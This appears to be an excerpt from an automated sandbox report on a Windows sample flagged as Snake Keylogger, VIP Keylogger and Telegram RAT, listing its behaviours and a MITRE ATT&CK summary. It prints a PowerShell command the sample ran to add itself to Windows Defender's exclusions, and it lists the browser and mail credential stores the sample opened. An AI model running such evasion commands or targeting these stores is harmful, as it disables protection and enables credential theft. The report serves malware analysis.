Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599560	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598671	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597796	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597577	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597468	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597140	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596921	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596590	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596234	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596125	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595796	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595218	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 594865	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 594640	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Thread delayed: delay time: 594531	Jump to behavior

Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3726403928.0000000006A40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3718826716.00000000013E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@,

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Code function: 6_2_06DF9548 LdrInitializeThunk,LdrInitializeThunk,

6_2_06DF9548

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, COVID19.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"			Jump to behavior

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"			Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process created: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"			Jump to behavior

Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager,q
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003686000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003686000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerPr
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager0
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003696000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerx
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager@\

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Queries volume information: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Queries volume information: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000006.00000002.3720383294.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3720383294.0000000003269000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	12 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	1 Security Software Discovery	SMB/Windows Admin Shares	1 Screen Capture	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
